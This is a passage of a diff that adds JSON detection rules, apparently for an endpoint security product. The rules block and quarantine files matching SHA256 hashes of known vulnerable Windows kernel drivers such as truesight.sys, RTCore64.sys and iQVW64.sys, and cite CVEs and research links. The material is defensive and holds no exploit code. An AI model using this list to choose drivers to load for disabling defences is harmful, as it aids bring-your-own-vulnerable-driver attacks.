+ "creation_date": "2026-03-23T11:45:29.981262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7108613244f16c2279c3c917aa49cef8acf0b92fdaa9ace19bf5cf634360d727",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f50fb48-6e83-5807-b7d8-c0abd0fc36d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807696Z",
+ "creation_date": "2026-03-23T11:45:31.807698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b1a16363471806fd07cbac03ae3a929fa508d165f381c50ee79d540ce94a9a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f5532d8-407d-5833-b978-0dc63772040e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830168Z",
+ "creation_date": "2026-03-23T11:45:31.830170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29da9a13dabdb33a4693d67afb5a512d350c3a7de60fd93abf8880c55dde0e57",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f55ae57-a764-5f84-bb3f-377877f23a29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479015Z",
+ "creation_date": "2026-03-23T11:45:31.479019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479029Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40bd99633a6b161cb5b9d3ba5e821e63a92839ae181a71b201bfe9d595010d63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f560968-6744-57d7-ae25-483535ba0209",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452769Z",
+ "creation_date": "2026-03-23T11:45:30.452772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452781Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb0742036c82709e02f25f98a9ff37c36a8c228bcaa98e40629fac8cde95b421",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f5eaaa9-fd72-5286-bbcc-d2bde250b2d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483961Z",
+ "creation_date": "2026-03-23T11:45:31.483965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2751662b682d8283f3b271d70cd5a8f76c7560060af7587efc787d0331940fed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f6c8e0a-e3ca-5dec-8bed-9dc91ba326a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148625Z",
+ "creation_date": "2026-03-23T11:45:31.148627Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c3524fae1dcc6cf4c49e53ca87c38e116e2995acc0129ced0ca3d1691c9c135",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f753c5b-5f0a-53d3-9f77-0af8d0a23cf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143206Z",
+ "creation_date": "2026-03-23T11:45:32.143208Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f6547e9823f94c5b94af1fb69a967c4902f72b6e0c783804835e6ce27f887b0",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f7a83da-48ac-5f8b-9582-a04352e7039d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622724Z",
+ "creation_date": "2026-03-23T11:45:29.622726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622732Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb68552936a6b0a68fb53ce864a6387d2698332aac10a7adfdd5a48b97027ce3",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f8885a1-b372-5e69-bc49-a53da16a0550",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819446Z",
+ "creation_date": "2026-03-23T11:45:30.819449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87b4c5b7f653b47c9c3bed833f4d65648db22481e9fc54aa4a8c6549fa31712b",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f8d7cab-3902-5fa4-8db3-9fe474e22899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809926Z",
+ "creation_date": "2026-03-23T11:45:31.809930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d911a3bddb038fc57677c138abdc490b707b86886765f2c6d31fce50481f52f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f9f0197-c33f-5731-b4bd-9354f7936ca5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491735Z",
+ "creation_date": "2026-03-23T11:45:31.491738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "435f57a97f28eca6fe5863aad3f365ec8fa65742576b5dbf9c0b853ca0e690e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f9f8c53-58c1-563a-8725-918d6f5fdc07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608892Z",
+ "creation_date": "2026-03-23T11:45:29.608894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608900Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79e3b14b68f1fcf805ccfe7bc2dc81b98346d2e83a6335816b276970e2e2691a",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fa594b3-616b-5842-bc94-2c920f8b330f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455788Z",
+ "creation_date": "2026-03-23T11:45:30.455791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c44b807e14e5da43a060cb36a83aa5b1e4b7b95620f9e41d289694f9daa8b77a",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fab0a1b-2cec-532a-a7f2-e480694c08ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813477Z",
+ "creation_date": "2026-03-23T11:45:31.813480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "948c00a80392791ab7f28bb6ffa79032f2f3835748c8f4cacf23103d4826ff0f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fae4450-c2dc-5f9f-8fb3-fe88cd88d3ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972422Z",
+ "creation_date": "2026-03-23T11:45:29.972424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcd4d4bee76aacba8792df291eb55cc716752bd7ddb51ecb9bec491b02f57c70",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fb9a891-b117-5654-9a9f-779015ad1fc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822152Z",
+ "creation_date": "2026-03-23T11:45:30.822154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a1d5ba96cde7e8485077763e34738bf9c2734c81440ecab82ff63606a50dfb2",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fc1c1e1-f7c3-5cbf-b05b-44db5062f96f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812729Z",
+ "creation_date": "2026-03-23T11:45:31.812732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6079447f59d41c7e67e24d4cf90e1f4b18090f3f8db689b430fee7a4ab661379",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fc4f610-2427-5618-913c-2bfd034b7535",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975735Z",
+ "creation_date": "2026-03-23T11:45:29.975737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd1d579a15ec3c1120cc6e0c8ff6b265623980de3570a5dd2f57d0c5981334d8",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fcab462-89f6-5e29-ba56-6763655e83c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971228Z",
+ "creation_date": "2026-03-23T11:45:29.971231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c18ae965fba56d09a65770b4d8da54ccd7801f979d3ebd283397bc99646004b",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fcd6410-b307-5247-84e2-f03f83bbdedc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616329Z",
+ "creation_date": "2026-03-23T11:45:29.616331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f60536b25ba8c9014e4a57d7a9a681bd3189fa414eea88c256d029750e15cae",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fd12092-f54b-5e8f-b004-2a1104dc74cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456048Z",
+ "creation_date": "2026-03-23T11:45:30.456051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52b9302507bccd7eb775137a4c17b0df9a5a99671968c01924cd0c52a0c69262",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fd13f91-490b-5df3-ace8-237b11078bfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145541Z",
+ "creation_date": "2026-03-23T11:45:31.145543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145548Z",
+ "rule_level": null,
+ "rule_level_override": null,
